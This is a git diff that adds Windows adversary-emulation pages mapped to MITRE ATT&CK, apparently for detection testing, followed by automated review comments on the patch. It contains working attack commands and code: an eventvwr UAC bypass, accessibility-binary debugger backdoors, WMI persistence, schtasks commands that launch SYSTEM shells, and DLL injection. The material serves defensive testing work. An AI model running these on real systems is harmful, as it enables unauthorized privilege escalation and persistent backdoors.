C:\UACBypassTest. + +#> + + [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] + Param ( + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Command, + + [Switch] + $Force + ) + $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin + $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop + + if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){ + "UAC is set to 'Always Notify'. 
This module does not bypass this setting." + exit + } + else{ + #Begin Execution + $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" + $Command = $pshome + '\' + $Command + #Add in the new registry entries to hijack the msc file + if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ + New-Item $mscCommandPath -Force | + New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null + }else{ + Write-Warning "Key already exists, consider using -Force" + exit + } + + if (Test-Path $mscCommandPath) { + Write-Verbose "Created registry entries to hijack the msc extension" + }else{ + Write-Warning "Failed to create registry key, exiting" + exit + } + + $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' + #Start Event Viewer + if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { + $Process = Start-Process -FilePath $EventvwrPath -PassThru + Write-Verbose "Started eventvwr.exe" + } + + #Sleep 5 seconds + Write-Verbose "Sleeping 5 seconds to trigger payload" + if (-not $PSBoundParameters['WhatIf']) { + Start-Sleep -Seconds 5 + } + + $mscfilePath = "HKCU:\Software\Classes\mscfile" + + if (Test-Path $mscfilePath) { + #Remove the registry entry + Remove-Item $mscfilePath -Recurse -Force + Write-Verbose "Removed registry entries" + } + + if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ + Stop-Process -Id $Process.Id + Write-Verbose "Killed running eventvwr process" + } + } +} diff --git a/Windows/Persistence/Accessibility_Features.md b/Windows/Persistence/Accessibility_Features.md new file mode 100644 index 00000000..42625417 --- /dev/null +++ b/Windows/Persistence/Accessibility_Features.md 
@@ -0,0 +1,31 @@ +## Accessibility Features + +MITRE ATT&CK Technique: [T1015](https://attack.mitre.org/wiki/Technique/T1015) + +### osk.exe swap + + reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f + +### sethc.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### utilman.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### magnify.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### narrator.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### DisplaySwitch.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### AtBroker.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AtBroker.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f diff --git a/Windows/Persistence/AppInit_DLLs.md b/Windows/Persistence/AppInit_DLLs.md new file mode 100644 index 00000000..5b834928 --- /dev/null +++ b/Windows/Persistence/AppInit_DLLs.md 
@@ -0,0 +1,24 @@ +## AppInit DLLs + +MITRE ATT&CK Technique: [T1103](https://attack.mitre.org/wiki/Technique/T1103) + +#### AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system: + HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows + +#### LoadAppInit_DLLs (REG_DWORD) Globally enables or disables AppInit_DLLs. + + 0x0 – AppInit_DLLs are disabled. + + 0x1 – AppInit_DLLs are enabled. + +#### AppInit_DLLs (REG_SZ) Space or comma delimited list of DLLs to load. The complete path to the DLL should be specified using Short Names. + + C:\ PROGRA~1\WID288~1\MICROS~1.DLL + +##### RequireSignedAppInit_DLLs (REG_DWORD) Only load code-signed DLLs. 0x0 – Load any DLLs. + + 0x1 – Load only code-signed DLLs. + +## Test Script + +[AppInitInject.reg](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AppInitInject.reg) diff --git a/Windows/Persistence/Application_Shimming.md b/Windows/Persistence/Application_Shimming.md new file mode 100644 index 00000000..a63d49db --- /dev/null +++ b/Windows/Persistence/Application_Shimming.md @@ -0,0 +1,17 @@ +## Application Shimming + +MITRE ATT&CK Technique: [T1138](https://attack.mitre.org/wiki/Technique/T1138) + +#### Deploying a custom shim database to users requires the following actions: + +##### 1.) Placing the custom shim database (*.sdb file) in a location to which the user’s computer has access (either locally or on the network) + +##### 2.) Possibly calling the sdbinst.exe command-line utility to install the custom shim database locally. + +##### 3.) Registry Modification - This is completed either manually or by an installation tool. + + HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom + + HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB + +#### Detecting the shim execution is difficult. We suggest detection of Shim Installation. 
diff --git a/Windows/Persistence/Authentication_Package.md b/Windows/Persistence/Authentication_Package.md new file mode 100644 index 00000000..759b89b0 --- /dev/null +++ b/Windows/Persistence/Authentication_Package.md @@ -0,0 +1,5 @@ +## Authentication Package + +MITRE ATT&CK Technique: [T1131](https://attack.mitre.org/wiki/Technique/T1131) + + HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ diff --git a/Windows/Persistence/Change_Default_File_Association.md b/Windows/Persistence/Change_Default_File_Association.md new file mode 100644 index 00000000..4eeaca66 --- /dev/null +++ b/Windows/Persistence/Change_Default_File_Association.md @@ -0,0 +1,13 @@ +# Change Default File Association + +MITRE ATT&CK Technique: [T1042](https://attack.mitre.org/wiki/Technique/T1042) + +## User file association preferences are stored under + + [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts + +Changes to a user's preference will occur under this entry's subkeys. + +## Change association with assoc.exe + + cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe" diff --git a/Windows/Persistence/Component_Object_Model_Hijacking.md b/Windows/Persistence/Component_Object_Model_Hijacking.md new file mode 100644 index 00000000..7bfef287 --- /dev/null +++ b/Windows/Persistence/Component_Object_Model_Hijacking.md @@ -0,0 +1,17 @@ +# Component Object Model Hijacking + +MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122) + +## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute. + +#### The presence of objects within + + HKEY_CURRENT_USER\Software\Classes\CLSID\ + +#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in + + HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\ + +## Test Script + +[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts) 
diff --git a/Windows/Persistence/Netsh_Helper_DLL.md b/Windows/Persistence/Netsh_Helper_DLL.md new file mode 100644 index 00000000..a60a1927 --- /dev/null +++ b/Windows/Persistence/Netsh_Helper_DLL.md @@ -0,0 +1,53 @@ +# Netsh Helper DLL + +MITRE ATT&CK Technique: [T1128](https://attack.mitre.org/wiki/Technique/T1128) + +## A DLL can be registered to be loaded each time netsh.exe is executed, or for certain events. + +Netsh interacts with other operating system components using dynamic-link library (DLL) files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to a networking component. For example, Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP servers. + +## Attackers can register a netsh helper with this command + + netsh.exe add helper C:\Path\file.dll + +## The following registry key stores the paths to the helpers + + HKLM\SOFTWARE\Microsoft\Netsh + +## Additional Netsh.exe testing we recommend + +### Firewall Control + +Input: + + netsh firewall set opmode [disable|enable] + +### Netsh.exe Pivoting + +Input: + + netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 + +Can also support v4tov6, v6tov6, and v6tov4 + +### Netsh.exe Sniffing + +Input: + + netsh trace start capture=yes overwrite=no tracefile= + +to stop: + + netsh trace stop + +### Netsh.exe Wireless backdoor + +Input: + + netsh wlan set hostednetwork mode=[allow\|disallow] + netsh wlan set hostednetwork ssid= key= keyUsage=persistent\|temporary + netsh wlan [start|stop] hostednetwork + +Enables or disables hostednetwork service. +Complete hosted network setup for creating a wireless backdoor. +Starts or stops a wireless backdoor. See below to set it up. diff --git a/Windows/Persistence/Scheduled_Task.md b/Windows/Persistence/Scheduled_Task.md new file mode 100644 index 00000000..80e125c5 --- /dev/null 
+++ b/Windows/Persistence/Scheduled_Task.md @@ -0,0 +1,9 @@ +## Scheduled Task + +MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053) + +### Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time + +[Examples Of Creating Tasks](https://technet.microsoft.com/en-us/library/cc725744(v=ws.11).aspx#BKMK_create) + + diff --git a/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md b/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md new file mode 100644 index 00000000..98471a9e --- /dev/null +++ b/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md 
@@ -0,0 +1,53 @@ +## Windows Management Instrumentation Event Subscription + +MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084) + +### Persistence + +Example: +```powershell +#Run from an administrator powershell window +#Code references +#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af +#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + +$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; +$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + +$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} +$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + +$FilterToConsumerArgs = @{ +Filter = [Ref] $Filter +Consumer = [Ref] $Consumer +} +$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs +``` + +After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. 
+ + +Cleanup: +```powershell +#Run from an administrator powershell window +#Code references +#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af +#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + +$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" +$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" +$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" + +$FilterConsumerBindingToCleanup | Remove-WmiObject +$EventConsumerToCleanup | Remove-WmiObject +$EventFilterToCleanup | Remove-WmiObject +``` + +#### References + +https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af +https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 \ No newline at end of file diff --git a/Windows/Privilege Escalation/Bypass_User_Account_Control.md b/Windows/Privilege Escalation/Bypass_User_Account_Control.md new file mode 100644 index 00000000..cfefd4e9 --- /dev/null +++ b/Windows/Privilege Escalation/Bypass_User_Account_Control.md 
@@ -0,0 +1,10 @@ +# Bypass User Account Control + +MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122) + +There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. + +## Test Script + +[UACBypass](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/UACBypass) + diff --git a/Windows/Privilege Escalation/DLL Injection.md b/Windows/Privilege Escalation/DLL Injection.md new file mode 100644 index 00000000..3334569d --- /dev/null +++ b/Windows/Privilege Escalation/DLL Injection.md @@ -0,0 +1,17 @@ +## DLL Injection + +MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055) + +Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution) + +### PowerShell Invoke-ReflectivePEInjection + +Input: + + C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1 + +### Powershell Invoke-DllInjection + +Input: + + C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll diff --git a/Windows/Privilege Escalation/Scheduled Task.md b/Windows/Privilege Escalation/Scheduled Task.md new file mode 100644 index 00000000..11b25dfb --- /dev/null +++ b/Windows/Privilege Escalation/Scheduled Task.md 
@@ -0,0 +1,34 @@ +## Scheduled Task + +MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053) + + +## at.exe + +Note: deprecated in Windows 8+ + +### Privileged Escalation + +This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system. + +Input: + + at 13:20 /interactive cmd + +Example: + + net use \\[computername|IP] /user:DOMAIN\username password + net time \\[computername|IP] + at \\[computername|IP] 13:20 c:\temp\evil.bat + +## schtask.exe + +### Launch Interactive cmd.exe + +Input: + + SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 + +Input: + + schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System" diff --git a/Windows/Windows.md b/Windows/Windows.md new file mode 100644 index 00000000..da536197 --- /dev/null +++ b/Windows/Windows.md 
@@ -0,0 +1,40 @@ +## MITRE ATT&CK Matrix - Windows + +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy | +| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control 
Protocol | +| Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| [Change Default File Association](Persistence/Change_Default_file_association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Component Object Model Hijacking | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | +| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels | +| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication | +| File System Permissions Weakness | New Service | Disabling Security Tools | | Security Software Discovery | Taint Shared Content | Rundll32 | Video Capture | | 
Multilayer Encryption | +| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System%20Information%20Discovery.md) | Third-party Software | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | | | Remote File Copy | +| Hypervisor | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | [File Deletion](Defense%20Evasion/File_deletion.md) | | System Network Configuration Discovery | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol | +| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol | +| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System%20Owner-User%20Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol | +| Modify Existing Service | Web Shell | Indicator Blocking | | System Service Discovery | | Trusted Developer Utilities | | | Uncommonly Used Port | +| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | System Time Discovery | | [Windows Management Instrumentation](Execution/Windows%20Management%20Instrumentation.md) | | | Web Service | +| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator%20Removal%20on%20Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | | +| Office Application Startup | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | | +| Path Interception | | [InstallUtil](Execution/RegsvcsRegasm.md) | | | | | | | | +| Redundant Access | | Masquerading | | | | | | | | +| Registry Run Keys / Start Folder | | Modify Registry | | | | | | | | +| Scheduled Task | | NTFS Extended Attributes | | | | | | | 
| +| Security Support Provider | | Network Share Connection Removal | | | | | | | | +| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | | +| Shortcut Modification | | Process Hollowing | | | | | | | | +| System Firmware | | Redundant Access | | | | | | | | +| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | | +| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | | +| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | | +| Winlogon Helper DLL | | Rundll32 | | | | | | | | +| | | Scripting | | | | | | | | +| | | Software Packing | | | | | | | | +| | | Timestomp | | | | | | | | +| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | | +| | | Valid Accounts | | | | | | | |
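Review bot: In Windows/Payloads/RegSvcsRegAsmBypass.cs the csc.exe build line in the header comment names `RegSvcsRegaAsmBypass.cs` (extra `a`), which does not match the file this hunk adds, so the documented build step fails as written. The trigger for `UnRegisterClass` is also described in three places that read differently: the attribute comment `//This executes if registration fails`, and the header lines `//Executes UnRegisterClass If you don't have permissions` and `//This calls the UnregisterClass Method` placed after the `/U` command lines. Suggest fixing the filename and replacing the three comments with one sentence stating that the method runs both on explicit `/U` unregistration and when registration fails for lack of permissions, so a reader testing detection knows which command line exercises which method.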
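Review bot: In Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1, `exit` is used in the 'Always Notify' branch, the 'Key already exists' branch and the 'Failed to create registry key' branch; inside a function `exit` terminates the calling PowerShell host rather than the function, so a tester who dot-sources the script loses their session. Use `return` (or `throw`) instead. The `.EXAMPLE` also passes an absolute path (`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc ...`) while the body does `$Command = $pshome + '\' + $Command`, which prefixes `$pshome` onto that absolute path and yields an invalid command; either drop the prefix or document that `-Command` must be relative to `$pshome`. Finally, with `-WhatIf` the `ShouldProcess` branch is skipped and `$Process` is never assigned, yet `Get-Process -Id $Process.Id` still runs in the cleanup block; guard it with a null check.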
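Review bot: Windows/Persistence/Accessibility_Features.md adds seven IFEO `Debugger` entries but no cleanup, unlike the WMI Event Subscription page in this patch, which pairs its test with a Cleanup block; a tester who runs these leaves cmd.exe bound to the accessibility binaries on the logon screen. Suggest a matching `REG DELETE "...\Image File Execution Options\<binary>" /v Debugger /f` line under each swap. The osk.exe entry also uses lowercase `reg add ... /v "Debugger" /t REG_SZ` while the other six use `REG ADD ... /t REG_SZ /v Debugger`; pick one form.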
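Review bot: In Windows/Persistence/AppInit_DLLs.md the sample value `C:\ PROGRA~1\WID288~1\MICROS~1.DLL` has a stray space after `C:\`, which makes the 'Short Names' example itself an invalid path. The `RequireSignedAppInit_DLLs` entry is also a `#####` heading, one level below its sibling `LoadAppInit_DLLs` and `AppInit_DLLs` entries, with its `0x0 – Load any DLLs.` option fused onto the heading line while `0x1` sits on its own indented line. Suggest `####` for the heading and both options on separate lines as in the LoadAppInit_DLLs block.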
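Review bot: In Windows/Persistence/Application_Shimming.md the three steps are written as `##### 1.)` / `2.)` / `3.)` headings rather than a numbered list, and the closing line 'We suggest detection of Shim Installation' does not say what to watch. The hunk already names the observables (`sdbinst.exe` execution and writes under `...\AppCompatFlags\Custom` and `...\AppCompatFlags\InstalledSDB`), so suggest stating explicitly that those are the detection points.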
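Review bot: Windows/Persistence/Authentication_Package.md contains only the key path `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\` with no explanation; a reader cannot tell which value under that key holds the package list or what a default versus modified entry looks like. Suggest naming the value and adding one line on the expected default, as the AppInit_DLLs page does for its values.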
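Review bot: In Windows/Persistence/Change_Default_File_Association.md the test line `cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe"` does not do what its heading says: `assoc` maps an extension to a file-type name and `ftype` maps that file type to a command line, so this records the executable path as a file-type name rather than changing what opens .wav files; `cmd.exe` also needs `/c` to run an inline command. Suggest showing the `assoc .ext=TypeName` step and the `ftype TypeName=...` step together. The key path `[HKEY_CURRENT_USER]\Software\...` also carries stray brackets around the hive name.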
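Review bot: In Windows/Persistence/Component_Object_Model_Hijacking.md one sentence is split across two `####` headings ('The presence of objects within' / 'May be anomalous and should be investigated since user objects will be loaded prior to machine objects in'), with the two CLSID paths as indented code between and after them; rendered as headings this reads poorly. Suggest plain paragraphs around the two paths, keeping the point that HKCU `CLSID` entries are loaded before the HKLM ones.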
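Review bot: In Windows/Persistence/Netsh_Helper_DLL.md several test inputs are incomplete or garbled: `netsh trace start capture=yes overwrite=no tracefile=` has an empty `tracefile=` value, `netsh wlan set hostednetwork ssid= key=` has empty `ssid=` and `key=`, and the wlan lines carry a literal backslash in `[allow\|disallow]` and `persistent\|temporary` inside an indented code block where no escaping is needed. The three explanatory sentences at the end ('Enables or disables hostednetwork service', 'Complete hosted network setup...', 'Starts or stops a wireless backdoor. See below to set it up') are listed in a different order from the three commands, and 'See below' points at nothing. Suggest placeholders such as `tracefile=<path>` and one description directly under each command.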
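Review bot: Windows/Persistence/Scheduled_Task.md has no test input at all, only a link to the TechNet task-creation examples, while the same technique (T1053) under Windows/Privilege Escalation/Scheduled Task.md in this patch does carry `at` and `schtasks` inputs; suggest cross-linking the two pages or moving the persistence-relevant `schtasks ... /sc ONLOGON` example here so the two do not drift.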
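Review bot: In Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md the Cleanup block builds its binding query from `$($EventConsumerToCleanup.__RELPATH)`; if the consumer lookup returns nothing (the persistence block was never run, or was run under a different name) that expands to `REFERENCES OF {}` and the query errors out while any leftover filter stays behind. Suggest a null check before each Remove-WmiObject, and for consistency the same API on both sides (the persistence block uses New-CimInstance, the cleanup uses Get-WmiObject/Remove-WmiObject). The file also ends without a trailing newline (`\ No newline at end of file`).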
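Review bot: Windows/Privilege Escalation/Bypass_User_Account_Control.md cites `MITRE ATT&CK Technique: T1122`, the same ID the Component Object Model Hijacking page in this patch uses; T1122 is COM Hijacking, and Bypass User Account Control is T1088 in this ATT&CK numbering. Suggest correcting both the ID and the link target.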
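Review bot: In Windows/Privilege Escalation/DLL Injection.md both 'Input' lines are just the path to a PowerSploit .ps1 file; `...\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll` hands those arguments to the script file, which only defines the function, so the test does nothing. The script has to be dot-sourced and the function then called with the parameters, and the Invoke-ReflectivePEInjection entry shows no parameters at all. Suggest writing both inputs as the function call a tester would actually run.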
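Review bot: In Windows/Privilege Escalation/Scheduled Task.md the heading `## schtask.exe` should be `schtasks.exe` (the commands below use `SCHTASKS`/`schtasks`), and `### Privileged Escalation` should read `Privilege Escalation`. The two schtasks inputs are also given without saying how they differ: only the second (`/sc ONLOGON /ru "System"`) is the privilege-escalation case, while the first (`/SC ONCE ... /ST 20:10`) runs as the creating user; a one-line description under each would help.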
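Review bot: In Windows/Windows.md several matrix cells disagree with the files this patch adds: the Persistence link `Persistence/Change_Default_file_association.md` does not match the file name `Change_Default_File_Association.md` (case matters on GitHub), the Defense Evasion cell `[InstallUtil](Execution/RegsvcsRegasm.md)` points at the Regsvcs/Regasm page while the Execution column links `Execution/InstallUtil.md`, and `Bypass User Account Control` (Privilege Escalation column) and `Component Object Model Hijacking` (Persistence column) are left unlinked although both pages are added here. 'Application Shimming' also appears under Execution, which does not match its placement in the Persistence and Privilege Escalation columns. Suggest fixing the two links and adding the two missing ones.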